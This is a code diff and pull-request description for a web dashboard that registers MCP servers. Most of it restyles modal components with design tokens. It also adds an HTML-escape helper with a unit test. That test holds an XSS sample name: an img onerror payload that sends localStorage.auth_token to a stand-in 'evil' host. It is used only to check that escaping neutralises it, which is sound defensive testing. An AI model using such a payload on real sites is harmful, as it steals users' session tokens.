-                                    className="px-2 py-0.5 bg-blue-100 dark:bg-blue-900/30 text-blue-700 dark:text-blue-300 rounded text-xs"
+                                    className="rounded-pill bg-glass-inset-gray px-2 py-0.5 text-xs text-ink-body"
                                   >
                                     {cap}
                                   </span>
@@ -560,7 +559,7 @@ export function MCPDetailModal({
                   )}
 
                   {loadingAttestations && (
-                    <div className="mt-4 text-center text-xs text-blue-600 dark:text-blue-400">
+                    <div className="mt-4 text-center text-xs text-ink-secondary">
                       Loading attestations...
                     </div>
                   )}
@@ -572,10 +571,10 @@ export function MCPDetailModal({
           {/* Description */}
           {mcp.description && (
             <div>
-              <h3 className="text-sm font-medium text-gray-700 dark:text-gray-300 mb-2">
+              <h3 className="text-sm font-medium text-ink-body mb-2">
                 Description
               </h3>
-              <p className="text-sm text-gray-600 dark:text-gray-400">
+              <p className="text-sm text-ink-secondary">
                 {mcp.description}
               </p>
             </div>
@@ -583,7 +582,7 @@ export function MCPDetailModal({
 
           {/* Capabilities */}
           <div>
-            <h3 className="text-sm font-medium text-gray-700 dark:text-gray-300 mb-3 flex items-center gap-2">
+            <h3 className="text-sm font-medium text-ink-body mb-3 flex items-center gap-2">
               <Key className="h-4 w-4" />
               Capabilities
             </h3>
@@ -591,17 +590,17 @@ export function MCPDetailModal({
               <div className="space-y-3">
                 {mcp.capabilities.map((capability) => {
                   const typeColors = {
-                    tool: "bg-blue-50 dark:bg-blue-900/20 border-blue-200 dark:border-blue-800 text-blue-900 dark:text-blue-100",
+                    tool: "bg-brand-soft border-stroke text-ink",
                     resource:
-                      "bg-purple-50 dark:bg-purple-900/20 border-purple-200 dark:border-purple-800 text-purple-900 dark:text-purple-100",
+                      "bg-glass-inset-gray border-stroke text-ink",
                     prompt:
-                      "bg-green-50 dark:bg-green-900/20 border-green-200 dark:border-green-800 text-green-900 dark:text-green-100",
+                      "bg-success-fill border-success-border text-ink",
                   };
 
                   return (
                     <div
                       key={capability.id}
-                      className={`p-3 border rounded-md ${typeColors[capability.type]}`}
+                      className={`p-3 border rounded-inset ${typeColors[capability.type]}`}
                     >
                       <div className="flex items-start justify-between gap-2">
                         <div className="flex-1">
@@ -610,7 +609,7 @@ export function MCPDetailModal({
                             <p className="text-sm font-semibold">
                               {capability.name}
                             </p>
-                            <span className="px-2 py-0.5 text-xs font-medium rounded-full bg-white/50 dark:bg-black/20">
+                            <span className="px-2 py-0.5 text-xs font-medium rounded-pill bg-glass-inset-gray">
                               {capability.type}
                             </span>
                           </div>
@@ -626,7 +625,7 @@ export function MCPDetailModal({
                 })}
               </div>
             ) : (
-              <div className="text-sm text-gray-500 dark:text-gray-400 italic">
+              <div className="text-sm text-ink-tertiary italic">
                 No capabilities registered
               </div>
             )}
@@ -634,7 +633,7 @@ export function MCPDetailModal({
 
           {/* Talks To (Agents) */}
           <div>
-            <h3 className="text-sm font-medium text-gray-700 dark:text-gray-300 mb-3 flex items-center gap-2">
+            <h3 className="text-sm font-medium text-ink-body mb-3 flex items-center gap-2">
               <svg
                 className="h-4 w-4"
                 fill="none"
@@ -648,21 +647,21 @@ export function MCPDetailModal({
                   d="M17 20h5v-2a3 3 0 00-5.356-1.857M17 20H7m10 0v-2c0-.656-.126-1.283-.356-1.857M7 20H2v-2a3 3 0 015.356-1.857M7 20v-2c0-.656.126-1.283.356-1.857m0 0a5.002 5.002 0 019.288 0M15 7a3 3 0 11-6 0 3 3 0 016 0zm6 3a2 2 0 11-4 0 2 2 0 014 0zM7 10a2 2 0 11-4 0 2 2 0 014 0z"
                 />
               </svg>
-              Talks To (Agents)
+              Talks to (agents)
             </h3>
             {mcp.talksTo && mcp.talksTo.length > 0 ? (
               <div className="flex flex-wrap gap-2">
                 {mcp.talksTo.map((agent, index) => (
                   <div
                     key={index}
-                    className="px-3 py-2 bg-green-50 dark:bg-green-900/20 border border-green-200 dark:border-green-800 rounded-md text-sm font-medium text-green-900 dark:text-green-100"
+                    className="px-3 py-2 bg-success-fill border border-success-border rounded-inset text-sm font-medium text-success-text"
                   >
                     {agent}
                   </div>
                 ))}
               </div>
             ) : (
-              <div className="text-sm text-gray-500 dark:text-gray-400 italic">
+              <div className="text-sm text-ink-tertiary italic">
                 No agents configured to use this MCP server
               </div>
             )}
@@ -671,98 +670,98 @@ export function MCPDetailModal({
           {/* Details Grid - Updated to match agent detail modal */}
           <div className="grid grid-cols-2 gap-6">
             <div className="col-span-2">
-              <h3 className="text-sm font-medium text-gray-700 dark:text-gray-300 mb-2">
+              <h3 className="text-sm font-medium text-ink-body mb-2">
                 URL
               </h3>
-              <p className="text-sm text-gray-900 dark:text-gray-100 font-mono break-all">
+              <p className="text-sm text-ink font-mono break-all">
                 {mcp.url}
               </p>
             </div>
 
             <div>
-              <h3 className="text-sm font-medium text-gray-700 dark:text-gray-300 mb-2">
+              <h3 className="text-sm font-medium text-ink-body mb-2">
                 Server ID
               </h3>
-              <p className="text-sm text-gray-900 dark:text-gray-100 font-mono">
+              <p className="text-sm text-ink font-mono">
                 {mcp.id}
               </p>
             </div>
 
             <div>
-              <h3 className="text-sm font-medium text-gray-700 dark:text-gray-300 mb-2">
+              <h3 className="text-sm font-medium text-ink-body mb-2">
                 Organization ID
               </h3>
-              <p className="text-sm text-gray-900 dark:text-gray-100 font-mono">
+              <p className="text-sm text-ink font-mono">
                 {/* MCP servers don't have organization_id, so we'll show placeholder */}
                 N/A
               </p>
             </div>
 
             <div>
-              <h3 className="text-sm font-medium text-gray-700 dark:text-gray-300 mb-2 flex items-center gap-2">
+              <h3 className="text-sm font-medium text-ink-body mb-2 flex items-center gap-2">
                 <Calendar className="h-4 w-4" />
                 Created
               </h3>
-              <p className="text-sm text-gray-900 dark:text-gray-100">
+              <p className="text-sm text-ink">
                 {formatDateTime(mcp.createdAt)}
               </p>
             </div>
 
             <div>
-              <h3 className="text-sm font-medium text-gray-700 dark:text-gray-300 mb-2 flex items-center gap-2">
+              <h3 className="text-sm font-medium text-ink-body mb-2 flex items-center gap-2">
                 <User className="h-4 w-4" />
-                Created By
+                Created by
               </h3>
-              <div className="text-sm text-gray-900 dark:text-gray-100">
+              <div className="text-sm text-ink">
                 {mcp.createdByName || mcp.createdByEmail ? (
                   <div className="flex flex-col gap-1">
                     {mcp.createdByName && (
                       <span className="font-medium">{mcp.createdByName}</span>
                     )}
                     {mcp.createdByEmail && (
-                      <span className="text-gray-500 dark:text-gray-400">{mcp.createdByEmail}</span>
+                      <span className="text-ink-secondary">{mcp.createdByEmail}</span>
                     )}
                     {mcp.createdBySdkTokenId && (
                       <Button
                         variant="link"
                         size="sm"
-                        className="p-0 h-auto text-xs text-blue-600 dark:text-blue-400 justify-start"
+                        className="p-0 h-auto text-xs justify-start"
                         onClick={() => {
                           onClose();
                           router.push(`/dashboard/sdk-tokens?highlight=${mcp.createdBySdkTokenId}`);
                         }}
                       >
                         <KeyRound className="h-3 w-3 mr-1" />
-                        View SDK Token
+                        View SDK token
                       </Button>
                     )}
                     {mcp.createdByApiKeyId && (
                       <Button
                         variant="link"
                         size="sm"
-                        className="p-0 h-auto text-xs text-orange-600 dark:text-orange-400 justify-start"
+                        className="p-0 h-auto text-xs justify-start text-warning-text"
                         onClick={() => {
                           onClose();
                           router.push(`/dashboard/api-keys?highlight=${mcp.createdByApiKeyId}`);
                         }}
                       >
                         <KeyRound className="h-3 w-3 mr-1" />
-                        View API Key
+                        View API key
                       </Button>
                     )}
                   </div>
                 ) : (
-                  <span className="text-gray-500 dark:text-gray-400">System</span>
+                  <span className="text-ink-secondary">System</span>
                 )}
               </div>
             </div>
 
             <div>
-              <h3 className="text-sm font-medium text-gray-700 dark:text-gray-300 mb-2 flex items-center gap-2">
+              <h3 className="text-sm font-medium text-ink-body mb-2 flex items-center gap-2">
                 <Clock className="h-4 w-4" />
-                Last Updated
+                Last updated
               </h3>
-              <p className="text-sm text-gray-900 dark:text-gray-100">
+              <p className="text-sm text-ink">
                 {mcp.lastVerifiedAt
                   ? formatDateTime(mcp.lastVerifiedAt)
                   : "Never"}
@@ -772,61 +771,61 @@ export function MCPDetailModal({
 
           {/* Cryptographic Identity Section */}
           {mcp.publicKey && (
-            <div className="border-t border-gray-200 dark:border-gray-700 pt-6">
+            <div className="border-t border-divider pt-6">
               <div className="flex items-center gap-2 mb-4">
-                <Key className="h-5 w-5 text-purple-600 dark:text-purple-400" />
-                <h3 className="text-lg font-semibold text-gray-900 dark:text-white">
-                  Cryptographic Identity
+                <Key className="h-5 w-5 text-brand-text" />
+                <h3 className="text-lg font-semibold text-ink">
+                  Cryptographic identity
                 </h3>
               </div>
 
-              <div className="bg-gray-50 dark:bg-gray-800 rounded-lg p-4 space-y-4">
+              <div className="rounded-card bg-glass-inset-gray p-4 space-y-4">
                 <div className="grid grid-cols-2 gap-4">
                   <div>
-                    <h4 className="text-sm font-medium text-gray-700 dark:text-gray-300 mb-2">
-                      Public Key Fingerprint (SHA-256)
+                    <h4 className="text-sm font-medium text-ink-body mb-2">
+                      Public key (prefix)
                     </h4>
-                    <p className="text-xs text-gray-900 dark:text-gray-100 font-mono bg-white dark:bg-gray-900 p-2 rounded border border-gray-200 dark:border-gray-700 break-all">
-                      {calculateFingerprint(mcp.publicKey)}
+                    <p className="text-xs text-ink font-mono bg-glass-inset p-2 rounded-inset-sm border border-stroke break-all">
+                      {publicKeyPrefix(mcp.publicKey)}
                     </p>
                   </div>
 
                   <div>
-                    <h4 className="text-sm font-medium text-gray-700 dark:text-gray-300 mb-2">
-                      Key Type
+                    <h4 className="text-sm font-medium text-ink-body mb-2">
+                      Key type
                     </h4>
-                    <p className="text-sm text-gray-900 dark:text-gray-100 font-medium">
+                    <p className="text-sm text-ink font-medium">
                       {mcp.keyType || "RSA-2048"}
                     </p>
                   </div>
                 </div>
 
                 <div>
-                  <h4 className="text-sm font-medium text-gray-700 dark:text-gray-300 mb-2">
-                    Public Key
+                  <h4 className="text-sm font-medium text-ink-body mb-2">
+                    Public key
                   </h4>
                   <div className="relative">
-                    <pre className="text-xs text-gray-900 dark:text-gray-100 font-mono bg-white dark:bg-gray-900 p-3 rounded border border-gray-200 dark:border-gray-700 overflow-x-auto max-h-32">
+                    <pre className="text-xs text-ink font-mono bg-glass-inset p-3 rounded-inset-sm border border-stroke overflow-x-auto max-h-32">
                       {mcp.publicKey}
                     </pre>
                     <button
                       onClick={handleDownloadKey}
-                      className="absolute top-2 right-2 p-1.5 bg-gray-100 dark:bg-gray-700 hover:bg-gray-200 dark:hover:bg-gray-600 rounded transition-colors"
+                      className="absolute top-2 right-2 p-1.5 bg-glass-inset-gray hover:bg-glass-inset rounded-inset-sm transition-colors"
                       title="Download public key"
                     >
-                      <Download className="h-4 w-4 text-gray-600 dark:text-gray-300" />
+                      <Download className="h-4 w-4 text-ink-body" />
                     </button>
                   </div>
                 </div>
 
-                <div className="flex items-center justify-between pt-2 border-t border-gray-200 dark:border-gray-700">
+                <div className="flex items-center justify-between pt-2 border-t border-divider">
                   <div className="flex items-center gap-2">
-                    <CheckCircle className="h-4 w-4 text-green-600 dark:text-green-400" />
-                    <span className="text-sm text-green-600 dark:text-green-400 font-medium">
+                    <CheckCircle className="h-4 w-4 text-success-text" />
+                    <span className="text-sm text-success-text font-medium">
                       Cryptographic identity verified on registration
                     </span>
                   </div>
-                  <div className="text-xs text-gray-500 dark:text-gray-400">
+                  <div className="text-xs text-ink-tertiary">
                     Ed25519 signature
                   </div>
                 </div>
@@ -838,16 +837,16 @@ export function MCPDetailModal({
             <TabsContent value="activity" className="space-y-4">
               {/* Audit Trail for this MCP */}
               <div>
-                <h3 className="text-sm font-medium text-gray-700 dark:text-gray-300 mb-3">
-                  Audit Trail
+                <h3 className="text-sm font-medium text-ink-body mb-3">
+                  Audit trail
                 </h3>
 
                 {loadingAuditLogs ? (
-                  <div className="text-center py-8 text-gray-500 dark:text-gray-400">
+                  <div className="text-center py-8 text-ink-secondary">
                     Loading audit logs...
                   </div>
                 ) : auditLogs.length === 0 ? (
-                  <div className="text-center py-8 text-gray-500 dark:text-gray-400">
+                  <div className="text-center py-8 text-ink-secondary">
                     <p>No audit events recorded yet</p>
                   </div>
                 ) : (
@@ -857,34 +856,34 @@ export function MCPDetailModal({
                       return (
                         <div
                           key={log.id}
-                          className="flex items-start gap-3 p-3 bg-gray-50 dark:bg-gray-800 rounded-lg"
+                          className="flex items-start gap-3 p-3 glass-inset"
                         >
                           <div className="flex-1 min-w-0">
                             <div className="flex items-center justify-between gap-2">
                               <p className={`text-sm font-medium ${actionInfo.color}`}>
                                 {actionInfo.label}
                               </p>
-                              <p className="text-xs text-gray-500 dark:text-gray-400 flex-shrink-0">
+                              <p className="text-xs text-ink-tertiary flex-shrink-0">
                                 {formatDateTime(log.timestamp)}
                               </p>
                             </div>
                             <div className="mt-1 text-sm">
                               {log.agentId ? (
-                                <span className="font-medium text-purple-600 dark:text-purple-400">
+                                <span className="font-medium text-brand-text">
                                   Agent: {log.agentName || log.metadata?.agentName || log.agentId.slice(0, 8)}
                                 </span>
                               ) : log.userId ? (
-                                <span className="font-medium text-blue-600 dark:text-blue-400">
+                                <span className="font-medium text-ink">
                                   User: {log.userName || log.metadata?.userName || log.userId.slice(0, 8)}
                                 </span>
                               ) : (
-                                <span className="text-gray-500 dark:text-gray-400">System</span>
+                                <span className="text-ink-tertiary">System</span>
                               )}
                             </div>
                             {log.metadata && Object.keys(log.metadata).length > 0 && (
-                              <div className="mt-2 text-xs text-gray-600 dark:text-gray-400 bg-gray-100 dark:bg-gray-700/50 rounded p-2">
+                              <div className="mt-2 text-xs text-ink-secondary bg-glass-inset rounded-inset-sm p-2">
                                 {log.metadata.auth_method && (
-                                  <p>Auth: {log.metadata.auth_method === "ed25519" ? "Ed25519 Signature" : log.metadata.auth_method}</p>
+                                  <p>Auth: {log.metadata.auth_method === "ed25519" ? "Ed25519 signature" : log.metadata.auth_method}</p>
                                 )}
                                 {(log.metadata.capabilities_found || log.metadata.capabilitiesFound) && (
                                   <p>Capabilities: {(log.metadata.capabilities_found || log.metadata.capabilitiesFound).length} detected</p>
@@ -893,7 +892,7 @@ export function MCPDetailModal({
                                   <p>Confidence: {log.metadata.confidence_score.toFixed(1)}%</p>
                                 )}
                                 {log.metadata.attestation_count !== undefined && (
-                                  <p>Total Attestations: {log.metadata.attestation_count}</p>
+                                  <p>Total attestations: {log.metadata.attestation_count}</p>
                                 )}
                                 {log.ipAddress && log.ipAddress !== "" && (
                                   <p>IP: {log.ipAddress}</p>
@@ -912,11 +911,11 @@ export function MCPDetailModal({
         </div>
 
         {/* Footer - Updated to match agent detail modal */}
-        <div className="flex items-center justify-end gap-3 px-6 py-4 border-t border-gray-200 dark:border-gray-700">
+        <div className="flex items-center justify-end gap-3 px-6 py-4 border-t border-divider">
           {onDelete && (
             <button
               onClick={() => onDelete(mcp)}
-              className="px-4 py-2 text-sm font-medium text-red-600 dark:text-red-400 hover:bg-red-50 dark:hover:bg-red-900/20 rounded-lg transition-colors flex items-center gap-2"
+              className="px-4 py-2 text-sm font-medium text-danger-text hover:bg-danger-fill rounded-pill transition-colors flex items-center gap-2"
             >
               <Trash2 className="h-4 w-4" />
               Delete
@@ -925,10 +924,10 @@ export function MCPDetailModal({
           {onEdit && (
             <button
               onClick={() => onEdit(mcp)}
-              className="px-4 py-2 text-sm font-medium text-white bg-blue-600 hover:bg-blue-700 rounded-lg transition-colors flex items-center gap-2"
+              className="px-4 py-2 text-sm font-medium text-ink-inverse bg-brand shadow-glow hover:bg-brand-hover rounded-pill transition-colors flex items-center gap-2"
             >
               <Edit className="h-4 w-4" />
-              Edit Server
+              Edit server
             </button>
           )}
         </div>

--- a/apps/web/components/modals/register-mcp-modal.tsx
+++ b/apps/web/components/modals/register-mcp-modal.tsx
@@ -169,7 +169,7 @@ export function RegisterMCPModal({
 
       // Show success toast
       toast.success(
-        editMode ? "MCP Server Updated Successfully" : "MCP Server Registered Successfully",
+        editMode ? "MCP server updated successfully" : "MCP server registered successfully",
         {
           description: editMode
             ? `${formData.name} has been updated.`
@@ -197,7 +197,7 @@ export function RegisterMCPModal({
       setError(errorMessage);
 
       // Show toast notification with the backend error message
-      toast.error("MCP Server Registration Failed", {
+      toast.error("MCP server registration failed", {
         description: errorMessage,
         action: {
           label: "Retry",
@@ -248,20 +248,20 @@ export function RegisterMCPModal({
 
   return (
     <div
-      className="fixed inset-0 z-50 flex items-center justify-center p-4 bg-black/50"
+      className="fixed inset-0 z-50 flex items-center justify-center p-4 bg-[rgba(29,29,31,0.45)] backdrop-blur-sm"
       style={{ margin: 0 }}
       onClick={handleOverlayClick}
     >
-      <div className="bg-white dark:bg-gray-900 rounded-lg shadow-xl max-w-3xl w-full max-h-[90vh] overflow-y-auto">
+      <div className="glass-chrome max-w-3xl w-full max-h-[90vh] overflow-y-auto">
         {/* Header */}
-        <div className="flex items-center justify-between px-6 py-4 border-b border-gray-200 dark:border-gray-700">
-          <h2 className="text-xl font-semibold text-gray-900 dark:text-white">
-            {editMode ? "Edit MCP Server" : "Register MCP Server"}
+        <div className="flex items-center justify-between px-6 py-4 border-b border-divider">
+          <h2 className="text-xl font-semibold text-ink">
+            {editMode ? "Edit MCP server" : "Register MCP server"}
           </h2>
           <button
             onClick={handleClose}
             disabled={loading}
-            className="text-gray-400 hover:text-gray-600 dark:hover:text-gray-300 transition-colors disabled:opacity-50"
+            className="text-ink-tertiary hover:text-ink transition-colors disabled:opacity-50"
           >
             <X className="h-5 w-5" />
           </button>
@@ -281,10 +281,10 @@ export function RegisterMCPModal({
           />
           {/* Success Message */}
           {success && (
-            <div className="p-4 bg-green-50 dark:bg-green-900/20 border border-green-200 dark:border-green-800 rounded-lg flex items-center gap-3">
-              <CheckCircle className="h-5 w-5 text-green-600 dark:text-green-400" />
-              <p className="text-sm text-green-800 dark:text-green-300">
-                MCP Server {editMode ? "updated" : "registered"} successfully!
+            <div className="p-4 bg-success-fill border border-success-border rounded-inset flex items-center gap-3">
+              <CheckCircle className="h-5 w-5 text-success-text" />
+              <p className="text-sm text-success-text">
+                MCP server {editMode ? "updated" : "registered"} successfully
               </p>
             </div>
           )}
@@ -293,11 +293,11 @@ export function RegisterMCPModal({
           {error && (
             <div
               ref={errorBannerRef}
-              className="p-4 bg-red-50 dark:bg-red-900/20 border border-red-200 dark:border-red-800 rounded-lg flex items-center gap-3"
+              className="glass-alert p-4 flex items-center gap-3"
             >
-              <AlertCircle className="h-5 w-5 text-red-600 dark:text-red-400" />
+              <AlertCircle className="h-5 w-5 text-danger-text" />
               <div className="flex-1">
-                <p className="text-sm text-red-800 dark:text-red-300">
+                <p className="text-sm text-danger-text">
                   {error}
                 </p>
               </div>
@@ -306,14 +306,14 @@ export function RegisterMCPModal({
 
           {/* Basic Information */}
           <div className="space-y-4">
-            <h3 className="text-sm font-semibold text-gray-900 dark:text-white uppercase tracking-wider">
-              Basic Information
+            <h3 className="text-overline">
+              Basic information
             </h3>
 
             {/* Server Name */}
             <div>
-              <label className="block text-sm font-medium text-gray-700 dark:text-gray-300 mb-1">
-                Server Name <span className="text-red-500">*</span>
+              <label className="block text-sm font-medium text-ink-body mb-1">
+                Server name <span className="text-danger-text">*</span>
               </label>
               <input
                 ref={nameRef}
@@ -323,21 +323,21 @@ export function RegisterMCPModal({
                   setFormData({ ...formData, name: e.target.value })
                 }
                 placeholder="e.g., filesystem-mcp or github-mcp"
-                className={`w-full px-3 py-2 bg-gray-50 dark:bg-gray-800 border rounded-lg focus:outline-none focus:ring-2 focus:ring-blue-500 text-gray-900 dark:text-gray-100 ${errors.name
-                  ? "border-red-500"
-                  : "border-gray-200 dark:border-gray-700"
+                className={`w-full px-3 py-2 bg-glass-inset border rounded-inset focus:outline-none focus:ring-2 focus:ring-ring text-ink placeholder:text-ink-tertiary ${errors.name
+                  ? "border-danger"
+                  : "border-stroke"
                   }`}
                 disabled={loading || success}
               />
               {errors.name && (
-                <p className="mt-1 text-xs text-red-500">{errors.name}</p>
+                <p className="mt-1 text-xs text-danger-text">{errors.name}</p>
               )}
             </div>
 
             {/* Server URL */}
             <div>
-              <label className="block text-sm font-medium text-gray-700 dark:text-gray-300 mb-1">
-                Server URL <span className="text-red-500">*</span>
+              <label className="block text-sm font-medium text-ink-body mb-1">
+                Server URL <span className="text-danger-text">*</span>
               </label>
               <input
                 ref={urlRef}
@@ -347,20 +347,20 @@ export function RegisterMCPModal({
                   setFormData({ ...formData, url: e.target.value })
                 }
                 placeholder="https://mcp.example.com"
-                className={`w-full px-3 py-2 bg-gray-50 dark:bg-gray-800 border rounded-lg focus:outline-none focus:ring-2 focus:ring-blue-500 text-gray-900 dark:text-gray-100 ${errors.url
-                  ? "border-red-500"
-                  : "border-gray-200 dark:border-gray-700"
+                className={`w-full px-3 py-2 bg-glass-inset border rounded-inset focus:outline-none focus:ring-2 focus:ring-ring text-ink placeholder:text-ink-tertiary ${errors.url
+                  ? "border-danger"
+                  : "border-stroke"
                   }`}
                 disabled={loading || success}
               />
               {errors.url && (
-                <p className="mt-1 text-xs text-red-500">{errors.url}</p>
+                <p className="mt-1 text-xs text-danger-text">{errors.url}</p>
               )}
             </div>
 
             {/* Description */}
             <div>
-              <label className="block text-sm font-medium text-gray-700 dark:text-gray-300 mb-1">
+              <label className="block text-sm font-medium text-ink-body mb-1">
                 Description
               </label>
               <textarea
@@ -370,14 +370,14 @@ export function RegisterMCPModal({
                 }
                 placeholder="Brief description of what this MCP server provides..."
                 rows={3}
-                className="w-full px-3 py-2 bg-gray-50 dark:bg-gray-800 border border-gray-200 dark:border-gray-700 rounded-lg focus:outline-none focus:ring-2 focus:ring-blue-500 text-gray-900 dark:text-gray-100"
+                className="w-full px-3 py-2 bg-glass-inset border border-stroke rounded-inset focus:outline-none focus:ring-2 focus:ring-ring text-ink placeholder:text-ink-tertiary"
                 disabled={loading || success}
               />
             </div>
 
             {/* Version */}
             <div>
-              <label className="block text-sm font-medium text-gray-700 dark:text-gray-300 mb-1">
+              <label className="block text-sm font-medium text-ink-body mb-1">
                 Version
               </label>
               <input
@@ -388,16 +388,16 @@ export function RegisterMCPModal({
                   setFormData({ ...formData, version: e.target.value })
                 }
                 placeholder="1.0.0"
-                className={`w-full px-3 py-2 bg-gray-50 dark:bg-gray-800 border rounded-lg focus:outline-none focus:ring-2 focus:ring-blue-500 text-gray-900 dark:text-gray-100 ${errors.version
-                  ? "border-red-500"
-                  : "border-gray-200 dark:border-gray-700"
+                className={`w-full px-3 py-2 bg-glass-inset border rounded-inset focus:outline-none focus:ring-2 focus:ring-ring text-ink placeholder:text-ink-tertiary ${errors.version
+                  ? "border-danger"
+                  : "border-stroke"
                   }`}
                 disabled={loading || success}
               />
               {errors.version && (
-                <p className="mt-1 text-xs text-red-500">{errors.version}</p>
+                <p className="mt-1 text-xs text-danger-text">{errors.version}</p>
               )}
-              <p className="mt-1 text-xs text-gray-500 dark:text-gray-400">
+              <p className="mt-1 text-xs text-ink-tertiary">
                 Must be in format X.Y.Z (e.g., 1.0.0)
               </p>
             </div>
@@ -405,21 +405,21 @@ export function RegisterMCPModal({
 
           {/* Security Configuration */}
           <div className="space-y-4">
-            <h3 className="text-sm font-semibold text-gray-900 dark:text-white uppercase tracking-wider">
-              Security Configuration (Optional)
+            <h3 className="text-overline">
+              Security configuration (optional)
             </h3>
 
             {/* Info Box - Automatic Security */}
-            <div className="bg-blue-50 dark:bg-blue-900/20 border border-blue-200 dark:border-blue-800 rounded-lg p-4">
+            <div className="bg-brand-soft border border-stroke rounded-inset p-4">
               <div className="flex items-start gap-3">
                 <div className="flex-shrink-0">
-                  <CheckCircle className="h-5 w-5 text-blue-600 dark:text-blue-400" />
+                  <CheckCircle className="h-5 w-5 text-brand-text" />
                 </div>
                 <div>
-                  <h4 className="text-sm font-medium text-blue-900 dark:text-blue-100">
-                    Automatic Key Generation & Verification
+                  <h4 className="text-sm font-medium text-ink">
+                    Automatic key generation and verification
                   </h4>
-                  <p className="mt-1 text-xs text-blue-700 dark:text-blue-300">
+                  <p className="mt-1 text-xs text-ink-body">
                     AIM will automatically generate Ed25519 cryptographic keys
                     and detect capabilities from your MCP server. You can
                     optionally provide your own public key if you've already
@@ -431,8 +431,8 @@ export function RegisterMCPModal({
 
             {/* Public Key */}
             <div>
-              <label className="block text-sm font-medium text-gray-700 dark:text-gray-300 mb-1">
-                Public Key (Optional)
+              <label className="block text-sm font-medium text-ink-body mb-1">
+                Public key (optional)
               </label>
               <textarea
                 value={formData.public_key}
@@ -441,36 +441,36 @@ export function RegisterMCPModal({
                 }
                 placeholder="Base64-encoded Ed25519 public key (leave empty for automatic generation)"
                 rows={3}
-                className="w-full px-3 py-2 bg-gray-50 dark:bg-gray-800 border border-gray-200 dark:border-gray-700 rounded-lg focus:outline-none focus:ring-2 focus:ring-blue-500 text-gray-900 dark:text-gray-100 font-mono text-xs"
+                className="w-full px-3 py-2 bg-glass-inset border border-stroke rounded-inset focus:outline-none focus:ring-2 focus:ring-ring text-ink placeholder:text-ink-tertiary font-mono text-xs"
                 disabled={loading || success}
               />
-              <p className="mt-1 text-xs text-gray-500 dark:text-gray-400">
-                If empty, AIM generates secure Ed25519 keys automatically
+              <p className="mt-1 text-xs text-ink-tertiary">
+                If empty, AIM generates Ed25519 keys automatically
               </p>
             </div>
           </div>
 
           {/* Auto-Detection Info */}
           <div className="space-y-4">
-            <h3 className="text-sm font-semibold text-gray-900 dark:text-white uppercase tracking-wider">
-              MCP Capabilities
+            <h3 className="text-overline">
+              MCP capabilities
             </h3>
 
-            <div className="bg-green-50 dark:bg-green-900/20 border border-green-200 dark:border-green-800 rounded-lg p-4">
+            <div className="bg-success-fill border border-success-border rounded-inset p-4">
               <div className="flex items-start gap-3">
                 <div className="flex-shrink-0">
-                  <CheckCircle className="h-5 w-5 text-green-600 dark:text-green-400" />
+                  <CheckCircle className="h-5 w-5 text-success-text" />
                 </div>
                 <div>
-                  <h4 className="text-sm font-medium text-green-900 dark:text-green-100">
-                    Automatic Capability Detection
+                  <h4 className="text-sm font-medium text-ink">
+                    Automatic capability detection
                   </h4>
-                  <p className="mt-1 text-xs text-green-700 dark:text-green-300">
+                  <p className="mt-1 text-xs text-ink-body">
                     AIM will automatically discover capabilities from your MCP server's{" "}
-                    <code className="bg-green-100 dark:bg-green-800 px-1 py-0.5 rounded">
+                    <code className="bg-glass-inset-gray text-ink px-1 py-0.5 rounded">
                       /.well-known/mcp/capabilities
                     </code>{" "}
-                    endpoint. No manual configuration needed!
+                    endpoint. No manual configuration needed.
                   </p>
                 </div>
               </div>
@@ -478,22 +478,22 @@ export function RegisterMCPModal({
           </div>
 
           {/* Footer */}
-          <div className="flex items-center justify-end gap-3 pt-4 border-t border-gray-200 dark:border-gray-700">
+          <div className="flex items-center justify-end gap-3 pt-4 border-t border-divider">
             <button
               type="button"
               onClick={handleClose}
               disabled={loading}
-              className="px-4 py-2 text-sm font-medium text-gray-700 dark:text-gray-300 hover:bg-gray-100 dark:hover:bg-gray-800 rounded-lg transition-colors disabled:opacity-50"
+              className="px-4 py-2 text-sm font-medium text-ink-body hover:bg-glass-inset-gray rounded-pill transition-colors disabled:opacity-50"
             >
               Cancel
             </button>
             <button
               type="submit"
               disabled={loading || (editMode && !success && !isFormDirty())}
-              className="px-4 py-2 text-sm font-medium text-white bg-blue-600 hover:bg-blue-700 rounded-lg transition-colors disabled:opacity-50 flex items-center gap-2"
+              className="px-4 py-2 text-sm font-medium rounded-pill bg-brand text-white shadow-glow hover:bg-brand-hover transition-colors disabled:opacity-50 flex items-center gap-2"
             >
               {loading && <Loader2 className="h-4 w-4 animate-spin" />}
-              {editMode ? "Update Server" : "Register Server"}
+              {editMode ? "Update server" : "Register server"}
             </button>
           </div>
         </form>

--- a/apps/web/lib/html-escape.test.ts
+++ b/apps/web/lib/html-escape.test.ts
@@ -1,0 +1,22 @@
+import { describe, expect, it } from "vitest";
+import { escapeHtml } from "@/lib/html-escape";
+
+describe("escapeHtml", () => {
+  it("escapes every character that can open markup or an attribute", () => {
+    expect(escapeHtml(`&<>"'`)).toBe("&amp;&lt;&gt;&quot;&#39;");
+  });
+
+  it("neutralises a hostile MCP server name", () => {
+    const name = `<img src=x onerror="fetch('https://evil/'+localStorage.auth_token)">`;
+    const out = escapeHtml(name);
+    expect(out).not.toContain("<");
+    expect(out).not.toContain(">");
+    expect(out).toBe("&lt;img src=x onerror=&quot;fetch(&#39;https://evil/&#39;+localStorage.auth_token)&quot;&gt;");
+  });
+
+  it("renders null, undefined and numbers as plain text", () => {
+    expect(escapeHtml(null)).toBe("");
+    expect(escapeHtml(undefined)).toBe("");
+    expect(escapeHtml(42)).toBe("42");
+  });
+});

--- a/apps/web/lib/html-escape.ts
+++ b/apps/web/lib/html-escape.ts
@@ -1,0 +1,14 @@
+/**
+ * Escapes a value for interpolation into an HTML document string. Used by the
+ * ABOM print export, which writes server- and agent-supplied names into a new
+ * window with document.write: every data value goes through this first.
+ */
+export function escapeHtml(value: unknown): string {
+  if (value === null || value === undefined) return "";
+  return String(value)
+    .replace(/&/g, "&amp;")
+    .replace(/</g, "&lt;")
+    .replace(/>/g, "&gt;")
+    .replace(/"/g, "&quot;")
+    .replace(/'/g, "&#39;");
+}


### PR DESCRIPTION
Last of six stacked pull requests (Glasshouse; the whole change is #418). Stacked on the security PR. With this merged, `main` carries the exact tree of #418.

## What this part contains

MCP servers, discovery, server detail, supply chain, A2A, the MCP modals and the network graph on the semantic tokens. Chart chrome reads CSS variables; the trust-colour legend swatches stay on the backend's literal scale because they must match the node colours the API sends.

